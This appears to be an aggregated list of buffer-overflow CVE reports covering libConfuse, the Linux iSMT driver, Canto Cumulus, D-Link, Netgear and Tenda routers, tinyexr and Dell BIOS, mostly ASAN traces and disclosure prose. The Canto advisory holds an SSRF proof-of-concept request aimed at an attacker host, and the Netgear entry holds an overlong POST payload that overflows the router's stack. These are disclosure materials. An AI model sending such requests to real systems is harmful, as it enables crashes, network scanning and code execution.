cfg_tilde_expand in confuse.c in libConfuse 3.3 has a heap-based buffer over-read.

Hello, I was testing my fuzzer and found a heap buffer overflow in cfg\_tilde\_expand, src/confuse.c:1909. A heap buffer overflow can be triggered when parsing a crafted file. As shown in the attachment

    CC="gcc -fsanitize=address -g " CXX="g++ -fsanitize=address -g" ./autogen.sh && ./configure --disable-shared && make -j$(nproc)
    ./examples/cfgtest $POC
    

    Using libConfuse 3.3 by Martin Hedenfalk <martin@bzero.se>
    
    =================================================================
    ==418268==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000572 at pc 0x7f94939440ab bp 0x7ffcd3b274a0 sp 0x7ffcd3b26c48
    READ of size 3 at 0x602000000572 thread T0
        #0 0x7f94939440aa in __interceptor_getpwnam ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1922
        #1 0x555a8791cb33 in cfg_tilde_expand /benchmark/libconfuse/src/confuse.c:1909
        #2 0x555a8792a97f in cfg_lexer_include /benchmark/libconfuse/src/lexer.l:332
        #3 0x555a8791d6e0 in call_function /benchmark/libconfuse/src/confuse.c:1274
        #4 0x555a87921a3e in cfg_parse_internal /benchmark/libconfuse/src/confuse.c:1566
        #5 0x555a87922523 in cfg_parse_fp /benchmark/libconfuse/src/confuse.c:1701
        #6 0x555a87922523 in cfg_parse_fp /benchmark/libconfuse/src/confuse.c:1685
        #7 0x555a8792266f in cfg_parse /benchmark/libconfuse/src/confuse.c:1802
        #8 0x555a8791750a in main /benchmark/libconfuse/examples/cfgtest.c:129
        #9 0x7f94936bad8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #10 0x7f94936bae3f in __libc_start_main_impl ../csu/libc-start.c:392
        #11 0x555a87917d04 in _start (/benchmark/libconfuse/examples/cfgtest+0x7d04)
    
    0x602000000572 is located 0 bytes to the right of 2-byte region [0x602000000570,0x602000000572)
    allocated by thread T0 here:
        #0 0x7f949396d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x555a8791cb0d in cfg_tilde_expand /benchmark/libconfuse/src/confuse.c:1904
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1922 in __interceptor_getpwnam
    Shadow bytes around the buggy address:
      0x0c047fff8050: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
      0x0c047fff8060: fa fa 00 fa fa fa 05 fa fa fa fd fa fa fa fd fa
      0x0c047fff8070: fa fa 00 fa fa fa fd fd fa fa 00 fa fa fa 00 fa
      0x0c047fff8080: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa 00 fa
      0x0c047fff8090: fa fa fd fd fa fa 00 fa fa fa 00 fa fa fa 00 fa
    =>0x0c047fff80a0: fa fa 00 fa fa fa 03 fa fa fa 00 fa fa fa[02]fa
      0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==418268==ABORTING

CVE-2022-40320: [BUG] heap buffer overflow in cfg_tilde_expand  · Issue #163 · libconfuse/libconfuse

A buffer overflow vulnerability was found in the Linux kernel Intel’s iSMT SMBus host controller driver in the way it handled the I2C_SMBUS_BLOCK_PROC_CALL case (via the ioctl I2C_SMBUS) with malicious input data. This flaw could allow a local user to crash the system.

Permalink

Browse files

i2c: ismt: prevent memory corruption in ismt\_access()

The "data->block\[0\]" variable comes from the user and is a number
between 0-255.  It needs to be capped to prevent writing beyond the end
of dma\_buffer\[\].

Fixes: 5e9a97b ("i2c: ismt: Adding support for I2C\_SMBUS\_BLOCK\_PROC\_CALL")
Reported-and-tested-by: Zheyu Ma <zheyuma97@gmail.com>
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>

*   Loading branch information

CVE-2022-3077: i2c: ismt: prevent memory corruption in ismt_access() · torvalds/linux@690b254

A Server-Side Request Forgery issue in Canto Cumulus through 11.1.3 allows attackers to enumerate the internal network, overload network resources, and possibly have unspecified other impact via the server parameter to the /cwc/login login form.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: Not yet assigned Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).\[1\] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter 'server' is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: \* Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server's infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. \* Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. \* Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. \* Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP\_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from \[WAN IP\]. Ncat: Connection from \[WAN IP\]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |...(reco........| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ....| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long..w{....| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco........cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ \[2\] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud\_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9 n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG 040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6 6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU= =FDje -----END PGP SIGNATURE-----

CVE-2022-40305

This advisory contains mitigations for Buffer Overflow, Access of Resource Using Incompatible Type, NULL Pointer Dereference vulnerabilities in libIEC61850 of IEC61850 implementation software.

MZ Automation libIEC61850

In D-Link DAP1650 v1.04 firmware, the fileaccess.cgi program in the firmware has a buffer overflow vulnerability caused by strncpy.

**Vulnerability Report**

Vendor: D-Link

Product: DAP-1650

Version: FW104WWb02(Download Link:https://support.dlink.com/ProductInfo.aspx?m=DAP-1650)

Type: Buffer Overflow

**Vulnerability description**

We found an buffer overflow vulnerability in G3 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In  fileaccess.cgi binary:

The 0x419EF8 function (extend\_session\_timeout), strncpy will copy the content after v1+4 to v4. The length of the copy is limited to v2-3. However v4 is 64 bytes . If v2 is larger than 67 bytes, it will cause a buffer overflow.

As you can see here, the input has not been checked. And then, call the function getenv  to get this input.

CVE-2022-36588: Bug-Report/dlink-dap1650-0x419EF8.md at main · Davidteeri/Bug-Report

Buffer Overflow in Netgear R8000 Router with firmware v1.0.4.56 allows remote attackers to execute arbitrary code or cause a denial-of-service by sending a crafted POST to '/bd_genie_create_account.cgi' with a sufficiently long parameter 'register_country'.

**Vulnerability Report**

Vendor: NETGEAR

Product: R8000

Version: 1.0.4.56(Download Link: https://www.netgear.com/support/download/?model=R8000)

Type: Stack-based Buffer Overflow

**Vulnerability description**

NETGEAR R8000 device's latest version 1.0.4.56 contains a stack-based buffer overflow in the binary httpd.The overflow allows an authenticated user to execute arbitrary code by POST to /bd_genie_create_account.cgi with a sufficiently long parameter register_country.

A constructed packet is POST to the interface \`\`/bd\_genie\_create\_account.cgi\`

    register_first_name=aaa&register_last_name=bbb&register_email=ccc&register_country=
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    &register_password=12345&register_confirm_password=12345&register_serial_number=1111
    

The stack-based overflows when the length of the parameter register_country value exceeds 0x6E4.

The POST request requires a valid parameter id. First, we need to get a legal id value by accessing the URL/genie_armor_create_account.htm

**PoC**

**Extar info**

Location of the vulnerability in the program /usr/sbin/httpd\`

Read parameter register_country

Propagate register_country to strcpy

CVE-2021-34236: Bug-Report/netgear-8000.md at main · Davidteeri/Bug-Report

In Tenda G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE, in httpd binary, the addDhcpRule function has a buffer overflow caused by sscanf.

**Vulnerability Report**

Vendor: Tenda

Product: G3 QoS VPN Router / Gateway

Version: 3.0(Download Link:https://www.tendacn.com/download/detail-3401.html)

Type: Buffer Overflow

**Vulnerability description**

We found an buffer overflow vulnerability in G3 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

The 0x62158 function (formAddDhcpBindRule), addDhcpRules is directly passed by the attacker, so we can control the addDhcpRules value.

As you can see here, the input has not been checked. And then,call the function websGetVar  to get this input.

After the addDhcpRules value is processed, it will be passed to the addDhcpRule function. The length of pSegment is not checked.

In addDhcpRule, the length of pRule (pSegment) is not checked but copied directly to dhcpsIndex, dhcpsIP and dhcpsMac. This leads to a buffer overflow vulnerability.

CVE-2022-36585: Bug-Report/tenda-G3-0x62158.md at main · Davidteeri/Bug-Report

In Tenda G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE, there is a buffer overflow vulnerability caused by sprintf in function in the httpd binary.

**Vulnerability Report**

Vendor: Tenda

Product: G3 QoS VPN Router / Gateway

Version: 3.0(Download Link:https://www.tendacn.com/download/detail-3401.html)

Type: Buffer Overflow

**Vulnerability description**

We found an buffer overflow vulnerability in G3 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

The 0x53208 function, portMirrorMirroredPorts is directly passed by the attacker, so we can control the pMirroredPorts value.

As you can see here, the input has not been checked. And then,call the function websGetVar  to get this input.

pMirroredPorts will be saved to sMibValue via sprintf. The length of sMibValue is 256 bytes. And the length of pMirroredPorts is not checked, which will lead to buffer overflow.

CVE-2022-36587: Bug-Report/tenda-G3- 0x53208.md at main · Davidteeri/Bug-Report

tinyexr commit 0647fb3 was discovered to contain a heap-buffer overflow via the component rleUncompress.

**Describe the issue**

Heap-buffer-overflow still exists in the rleUncompress.

_**This is similar to issue #112, but it seems that the patch 58a6258 has not fully fixed them.**_

**To Reproduce**

_Environment_

*   OS: Ubuntu 16.04.7 LTS
*   Compiler: gcc version 5.4.0

_version:_ latest commit 0647fb3

_poc:_ poc

Steps to reproduce the behavior:

1.  Compile TinyEXR with Address Sanitizer

    CFLAGS="-g -O0 -fsanitize=address" CXXFLAGS="-g -O0 -fsanitize=address" cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release ..
    

2.  run ./test_tinyexr ./poc

Here is the trace reported by ASAN:

    root@d8a714203f6e:# ./test_tinyexr poc
    =================================================================
    ==14886==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006337 at pc 0x00000040c22d bp 0x7fffffffcb50 sp 0x7fffffffcb40
    READ of size 1 at 0x619000006337 thread T0
        #0 0x40c22c in rleUncompress tinyexr/tinyexr.h:1522
        #1 0x40c22c in DecompressRle tinyexr/tinyexr.h:1625
        #2 0x40c22c in DecodePixelData tinyexr/tinyexr.h:3786
        #3 0x411318 in DecodeChunk tinyexr/tinyexr.h:5176
        #4 0x41a3e9 in DecodeEXRImage tinyexr/tinyexr.h:5776
        #5 0x41dcc7 in LoadEXRImageFromMemory tinyexr/tinyexr.h:6465
        #6 0x41dcc7 in LoadEXRImageFromFile tinyexr/tinyexr.h:6442
        #7 0x4288ae in LoadEXRWithLayer tinyexr/tinyexr.h:5954
        #8 0x40502f in LoadEXR tinyexr/tinyexr.h:5902
        #9 0x40502f in test_main tinyexr/test_tinyexr.cc:223
        #10 0x40502f in main tinyexr/test_tinyexr.cc:194
        #11 0x7ffff652883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
        #12 0x4053b8 in _start (tinyexr/build-gcc/test_tinyexr+0x4053b8)
    
    0x619000006337 is located 0 bytes to the right of 951-byte region [0x619000005f80,0x619000006337)
    allocated by thread T0 here:
        #0 0x7ffff6f03532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532)
        #1 0x41dc55 in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/5/ext/new_allocator.h:104
        #2 0x41dc55 in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:491
        #3 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/5/bits/stl_vector.h:170
        #4 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) /usr/include/c++/5/bits/stl_vector.h:185
        #5 0x41dc55 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_Vector_base(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/5/bits/stl_vector.h:136
        #6 0x41dc55 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/5/bits/stl_vector.h:278
        #7 0x41dc55 in LoadEXRImageFromFile tinyexr/tinyexr.h:6432
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow tinyexr/tinyexr.h:1522 rleUncompress
    Shadow bytes around the buggy address:
      0x0c327fff8c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c327fff8c60: 00 00 00 00 00 00[07]fa fa fa fa fa fa fa fa fa
      0x0c327fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==14886==ABORTING

CVE-2022-38529: Heap-buffer-overflow still exists in the rleUncompress · Issue #169 · syoyo/tinyexr

Dell BIOS versions contain an Insecure Automated Optimization vulnerability. A local authenticated malicious user could exploit this vulnerability by sending malicious input via SMI to obtain arbitrary code execution during SMM.

Tag

#buffer_overflow